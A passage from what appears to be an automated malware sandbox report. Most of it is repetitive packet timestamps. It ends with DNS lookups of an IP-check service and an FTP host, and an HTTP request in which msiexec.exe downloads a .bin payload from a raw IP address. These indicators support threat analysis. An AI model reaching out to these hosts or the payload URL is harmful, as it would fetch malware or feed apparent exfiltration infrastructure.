                                    Sep 27, 2024 18:34:24.687113047 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.687144995 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.687189102 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.687233925 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755568027 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755637884 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755667925 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755669117 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755707979 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755719900 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755754948 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755764961 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755788088 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755809069 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755821943 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.755862951 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.755947113 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756247044 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756300926 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756361961 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756371975 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756391048 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756402969 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756444931 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756484985 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756498098 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756546021 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.756584883 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.756644011 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761688948 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.761717081 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.761755943 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761810064 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761818886 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.761854887 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.761889935 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.761892080 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761929989 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761948109 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.761970997 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762002945 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762026072 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762052059 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762062073 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762120008 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762100935 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762182951 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762237072 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762299061 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762716055 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762767076 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762778997 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762835026 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.762881994 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762931108 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.762963057 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763046980 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763078928 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763088942 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763112068 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763144970 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763154984 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763154984 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763180017 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763197899 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763219118 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763259888 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.763897896 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.763955116 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767100096 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767149925 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767168045 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767199039 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767208099 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767235041 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767254114 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767271996 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767281055 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767306089 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767332077 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767369986 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767462015 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767513990 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767519951 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767546892 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767575979 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767600060 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767601967 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767635107 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767657042 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767668962 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767694950 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767702103 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767720938 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767736912 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.767759085 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.767793894 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.768358946 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.768409014 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.768428087 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.768464088 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773534060 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773600101 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773601055 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773628950 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773659945 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773680925 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773695946 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773714066 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773736954 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773746967 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773781061 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773807049 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.773917913 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.773968935 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774032116 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774060965 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774086952 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774096012 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774112940 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774128914 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774166107 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774188042 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774194956 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774247885 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774274111 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774283886 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774319887 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774349928 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774405003 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774436951 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774468899 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774468899 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774502039 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774504900 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774524927 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774535894 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774554968 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774591923 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774663925 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774727106 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774754047 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774802923 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774815083 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774837971 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774858952 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774871111 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.774907112 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.774931908 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842348099 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842384100 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842432976 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842483997 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842489958 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842519045 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842554092 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842565060 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842590094 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842593908 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842633963 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842652082 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842699051 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842730045 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842784882 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842808962 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842843056 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842866898 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842894077 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842897892 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842926979 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842952967 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842961073 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.842981100 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.842997074 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843020916 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843046904 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843050003 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843080044 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843107939 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843112946 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843141079 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843163967 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843199015 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.843202114 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843224049 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.843256950 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848515034 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848568916 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848597050 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848644972 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848650932 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848678112 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848710060 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848712921 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848754883 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848788023 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848875999 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848908901 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848942041 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848957062 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848957062 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.848975897 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.848990917 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849023104 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849158049 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849189997 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849220037 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849240065 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849241018 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849273920 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849299908 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849308014 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849329948 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849361897 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849493980 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849525928 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849554062 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849560976 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849574089 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849613905 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849625111 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849647999 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849668026 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849680901 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849700928 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849715948 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849730968 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849754095 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849766970 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849787951 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849809885 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849821091 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849842072 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849857092 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.849877119 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.849924088 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850358963 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850390911 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850421906 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850425005 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850445032 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850474119 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850477934 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850507975 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850528002 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850539923 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850557089 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850574017 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850593090 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850626945 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850636959 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850660086 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850689888 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850692987 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850708008 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850728035 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850749016 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850760937 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.850783110 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.850816011 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.851295948 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.851345062 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.851356030 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.851380110 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.851428986 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.851432085 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.851432085 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.851464033 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.851490021 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.851511955 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.853981972 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854015112 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854032993 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854048967 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854106903 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854144096 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854181051 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854212999 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854213953 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854247093 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854248047 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854264021 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854302883 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854458094 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854510069 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854528904 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854559898 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854568005 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854594946 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854620934 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854629040 CEST804971484.38.133.140192.168.2.5
                                    Sep 27, 2024 18:34:24.854644060 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:24.854691029 CEST4971480192.168.2.584.38.133.140
                                    Sep 27, 2024 18:34:25.179435968 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.179506063 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.179580927 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.190516949 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.190541983 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.675139904 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.675216913 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.679369926 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.679397106 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.679647923 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.722544909 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.763405085 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.829799891 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.829864979 CEST44349715104.26.13.205192.168.2.5
                                    Sep 27, 2024 18:34:25.829925060 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:25.833801031 CEST49715443192.168.2.5104.26.13.205
                                    Sep 27, 2024 18:34:27.164324999 CEST4971621192.168.2.5192.185.13.234
                                    Sep 27, 2024 18:34:27.169306993 CEST2149716192.185.13.234192.168.2.5
                                    Sep 27, 2024 18:34:27.169388056 CEST4971621192.168.2.5192.185.13.234
                                    Sep 27, 2024 18:34:27.172436953 CEST4971621192.168.2.5192.185.13.234
                                    Sep 27, 2024 18:34:27.177423954 CEST2149716192.185.13.234192.168.2.5
                                    Sep 27, 2024 18:34:27.177511930 CEST4971621192.168.2.5192.185.13.234
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 27, 2024 18:34:25.165144920 CEST5753253192.168.2.51.1.1.1
                                    Sep 27, 2024 18:34:25.174098015 CEST53575321.1.1.1192.168.2.5
                                    Sep 27, 2024 18:34:26.846685886 CEST5227053192.168.2.51.1.1.1
                                    Sep 27, 2024 18:34:27.162977934 CEST53522701.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 27, 2024 18:34:25.165144920 CEST192.168.2.51.1.1.10xd1deStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                    Sep 27, 2024 18:34:26.846685886 CEST192.168.2.51.1.1.10xdfd5Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 27, 2024 18:34:25.174098015 CEST1.1.1.1192.168.2.50xd1deNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                    Sep 27, 2024 18:34:25.174098015 CEST1.1.1.1192.168.2.50xd1deNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                    Sep 27, 2024 18:34:25.174098015 CEST1.1.1.1192.168.2.50xd1deNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                    Sep 27, 2024 18:34:27.162977934 CEST1.1.1.1192.168.2.50xdfd5No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                    Sep 27, 2024 18:34:27.162977934 CEST1.1.1.1192.168.2.50xdfd5No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                    • api.ipify.org
                                    • 84.38.133.140
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54971484.38.133.140803876C:\Windows\SysWOW64\msiexec.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 27, 2024 18:34:23.783452988 CEST187OUTGET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: 84.38.133.140
                                    Cache-Control: no-cache
                                    Sep 27, 2024 18:34:24.433077097 CEST1236INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Thu, 26 Sep 2024 21:19:26 GMT
                                    Accept-Ranges: bytes
                                    ETag: "68e9dcc35910db1:0"
                                    Server: Microsoft-IIS/8.5
                                    Date: Fri, 27 Sep 2024 16:34:23 GMT
                                    Content-Length: 241728
